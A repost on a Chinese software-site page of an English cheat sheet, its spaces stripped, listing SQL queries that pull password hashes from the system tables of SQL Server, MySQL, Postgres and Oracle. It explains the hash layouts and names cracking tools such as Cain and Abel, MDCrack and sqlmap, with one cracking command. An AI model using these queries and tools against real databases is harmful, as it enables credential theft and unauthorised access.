文章导航PC6首页软件下载单机游戏安卓资源苹果资源

pc软件新闻网络操作系统办公工具编程服务器软件评测

安卓新闻资讯应用教程刷机教程安卓游戏攻略tv资讯深度阅读综合安卓评测

苹果ios资讯苹果手机越狱备份教程美化教程ios软件教程mac教程

单机游戏角色扮演即时战略动作射击棋牌游戏体育竞技模拟经营其它游戏游戏工具

网游cf活动dnf活动lol周免英雄lol礼包

手游最新动态手游评测手游活动新游预告手游问答

您的位置:首页技术开发数据库技巧 → 数据库查询语句

数据库查询语句

时间:2010/1/28 11:51:00来源:本站整理作者:我要评论(0)

有没access也可以抓取的?

    各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!

    SQLServer2000:-

    SELECTpasswordfrommaster。dbo。sysxloginswherename='sa'

    0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

    2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

    0×0100-constantheader

    34767D5C-salt

    0CFA5FDCA28C4A56085E65E882E71CB0ED250341-casesenstivehash

    2FD54D6119FFF04129A1D72E7C3194F7284A7F3A-uppercasehash

    cracktheuppercasehashin'cainandabel'andthenworkthecasesentivehash

    SQLserver2005:-

    SELECTpassword_hashFROMsys。sql_loginswherename='sa'

    0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

    0×0100-constantheader

    993BF231-salt

    5F36CC441485B35C4D84687DC02C78B0E680411F-casesensitivehash

    crackcasesensitivehashincain,trybruteforceanddictionarybasedattacks。

    update:-followingbernardo'scomments:-

    usefunctionfn_varbintohexstr()tocastpasswordinahexstring。

    e。g。selectnamefromsysxloginsunionallselectmaster。dbo。 fn_varbintohexstr(password)fromsysxlogins

    MYSQL:-

    InMySQLyoucangeneratehashesinternallyusingthepassword(),md5(),orsha1functions。 password()isthefunctionusedforMySQL'sownuserauthenticationsystem。 Itreturnsa16-bytestringforMySQLversionspriorto4。1,anda41- bytestring(basedonadoubleSHA-1hash)forversions4。1andup。 md5()isavailablefromMySQLversion3。23。2andsha1()wasaddedlaterin4。0。2。

    *mysql<4。1

    mysql>SELECTPASSWORD('mypass');

    +——————–+

    |PASSWORD('mypass')|

    +——————–+

    |6f8c114b58f2ce9e|

    +——————–+

    *mysql>=4。1

    mysql>SELECTPASSWORD('mypass');

    +——————————————-+

    |PASSWORD('mypass')|

    +——————————————-+

    |*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4|

    +——————————————-+

    Selectuser,passwordfrommysql。user

    Thehashescanbecrackedin'cainandabel'

    Postgres:-

    PostgreskeepsMD5-basedpasswordhashesfordatabase- levelusersinthepg_shadowtable。 Youneedtobethedatabasesuperusertoreadthistable(usuallycalled"postgres"or"pgsql")

    selectusename,passwdfrompg_shadow;

    usename|passwd

    ——————+————————————-

    testuser|md5fabb6d7172aadfda4753bf0507ed4396

    usemdcracktocrackthesehashes:-

    $wineMDCrack-sse。exe–algorithm=MD5– append=testuserfabb6d7172aadfda4753bf0507ed4396

    Oracle:-

    selectname,password,spare4fromsys。user$

    hashescouldbecrackedusing'cainandabel'orthc-orakelcrackert11g

    MoreonOraclelater,iamabitbored…。


 

相关视频

    没有数据

相关阅读 数据库流行度排行2019年9月 数据库排行榜2019年最新版fifa online4数据库大全 fifa online4球员数据库在哪myeclipse怎么连接到数据库 myeclipse连接到数据库方法PLSQL Developer怎么导出数据库PLSQL Developer配置Oralce11g连接plsql developer怎么使用 plsql developer使用教程plsql developer怎么连接数据库 plsql developer连接数据库教程mysql数据库root密码忘记的修改方法

文章评论
发表评论

热门文章 没有查询到任何记录。

最新文章 mssql企业管理器不能打 Oracle PRKC-1002错误原因和解决方案SQL SERVER数据库日志清空图文教程win2003计算机改名后sql server 2005 本地复DB2错误信息码大全

人气排行 彻底解决mysql中文乱码的办法mysql数据库root密码忘记的修改方法SQL SERVER数据库日志清空图文教程.bak备份文件如何恢复Oracle PRKC-1002错误原因和解决方案Oracle错误代码大全如何将txt的文本数据导入SQL server 2005呢DB2错误信息码大全